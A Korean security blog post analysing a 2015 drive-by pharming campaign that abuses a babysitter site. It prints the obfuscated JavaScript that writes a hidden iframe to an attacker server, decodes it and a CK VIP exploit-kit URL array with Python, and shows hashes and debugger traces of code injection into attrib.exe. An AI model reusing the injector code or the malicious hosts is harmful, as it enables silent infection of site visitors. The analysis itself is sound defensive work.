여러 사이트를 이용한 파밍 유포

Notice

Recent Posts

Link

삽질인생

« 2025/02 »
일	월	화	수	목	금	토
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28

Tags more

Archives

Today

Total

관리 메뉴

annyoung

여러 사이트를 이용한 파밍 유포 본문

분석생활

여러 사이트를 이용한 파밍 유포

nopsled 2015. 5. 31. 02:45

고운빛 베이비시터 사이트에서 iframe을 사용하여 몰래 유포 중이다.

var _$=['\x66\x61\x6b\x65\x3d','\x66\x61\x6b\x65\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d',

"\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x32\x31\x31\x2e\x35\x38\x2e\x32\x35\x35\x2e\x32\x31\x39\x2f\x75\x73\x61\x2f\x6d\x79\x67\x61\x2e\x68\x74\x6d\x6c\x20\x77\x69\x64\x74\x68\x3d\x30\x20\x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e"];

if(document.cookie.indexOf(_$[0])==-0x1){var a=new Date();a.setTime(a.getTime()+0xc*0x3c*0x3c*0x3e8);document.cookie=_$[1]+a.toGMTString();document.write(_$[2])}

</script>

코드 더럽게 길네.. hex로 인코딩되어 복호화 하게 된다.

복호화 하는 방법은 대체적으로 간단하다.

>>> hexList = ['\x66\x61\x6b\x65\x3d','\x66\x61\x6b\x65\x3d\x59\x65\x73\x3b\x70\

x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d',"\x3c\x69\x66\x72\x61\x

6d\x65\x20\x73\x72\x63\x3d\x68\x74\x74\x70\x3a\x2f\x2f\x32\x31\x31\x2e\x35\x38\x

2e\x32\x35\x35\x2e\x32\x31\x39\x2f\x75\x73\x61\x2f\x6d\x79\x67\x61\x2e\x68\x74\x

6d\x6c\x20\x77\x69\x64\x74\x68\x3d\x30\x20\x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x

3c\x2f\x69\x66\x72\x61\x6d\x65\x3e"]

>>> print hexList[2]

>>>

이런식으로 파이썬으로 복호화 하면 된다. (아쒸.. 많이 작성했는데 복붙했더니 크래쉬나더니 브라우져가 죽어서 처음부터 다시 작성한다..ㅡㅡ;; 자동 저장기능이 되고 있는건가 마는건가.. -_-;;)

대부분 이런방식으로 유포되는건 가장 긴부분이 iframe으로 되어 있어서 쉽게 유추가 가능하다. 가장 긴 Hex는 인덱스 넘버2이므로 2번째꺼만 복호화 하였다.

+ 211.58.255.219가 자꾸 해커 서버로 생각이 되는 이유는 뭘까..-_-

최종적으로 CK VIP Exploit kit이 있는 유포지가 프레임으로 생성된다.

function ckl(){var bmw=new Array(263,275,275,271,217,206,206,273,260,278,256,275,260,273,205,266,273,206,

257,257,274,254,274,276,269,206,261,264,267,260,274,206,279,205,260,268,159,261);return bmw;}function ckls()

가장 하단에 있는 악성코드 URL만 복호화하면 되므로 간단하게 복호화한다.

>>> bmw = [263,275,275,271,217,206,206,273,260,278,256,275,260,273,205,

266,273,206,257,257,274,254,274,276,269,206,261,264,267,

260,274,206,279,205,260,268,159,261]

>>> for i in range(0, len(bmw)):

... print chr(bmw[i] - 159),

...

h t t p : / / r e w a t e r . k r / b b s _ s u n / f i l e s / x . e m f

이런식으로 복호화 하면 된다. (CK VIP를 분석해본 사람들은 알겠지만, 암호화된 인덱스를 159만큼 빼면 원문이 나오게 된다.)

복호화 하게 되면 emf 확장자가 나오는데 fake extension이므로 속지 말자.

Hex editor로 보게되면 4D 5A로 실행 가능한 파일이다.

어찌 됬건.. 리워터코리아에 바이너리가 업로드되어 경유지로 사용 중이다.

FileName	x.emf
MD5	EA58648E69D52B505921F940A3833A72
SHA-1	2D4BEE059418DC625EBF4CD5001A9A0E0F60B56D
Packer	PEcompact ver.2.78a ~ 3.11.00

해당 바이너리는 PEcompact로 패킹 되었고.. Manual unpacking 방법은 여기 블로그에서 PEcompact를 검색하여 뒤적이다보면 나온다. 그러므로 언패킹 방법을 다시 얘기하진 않고 진행하겠다.

0012FEC0 00405A0E /CALL to CreateProcessA

0012FEC4 00000000 |ModuleFileName = NULL

0012FEC8 00162AF8 |CommandLine = "C:\Windows\System32\attrib.exe"

0012FECC 00000000 |pProcessSecurity = NULL

0012FED0 00000000 |pThreadSecurity = NULL

0012FED4 00000000 |InheritHandles = FALSE

0012FED8 00000004 |CreationFlags = CREATE_SUSPENDED

0012FEDC 00000000 |pEnvironment = NULL

0012FEE0 00000000 |CurrentDir = NULL

0012FEE4 00157530 |pStartupInfo = 00157530

0012FEE8 001553D8 \pProcessInfo = 001553D8

코드 인젝션을 위해서 %systemroot%\System32\attrib.exe를 SUSPENDED 상태로 실행 시킨다.

0012FED4 0040601F /CALL to WriteProcessMemory

0012FED8 00000054 |hProcess = 00000054

0012FEDC 00400000 |Address = 400000

0012FEE0 00199FE8 |Buffer = 00199FE8

0012FEE4 00000400 |BytesToWrite = 400 (1024.)

0012FEE8 0012FF20 \pBytesWritten = 0012FF20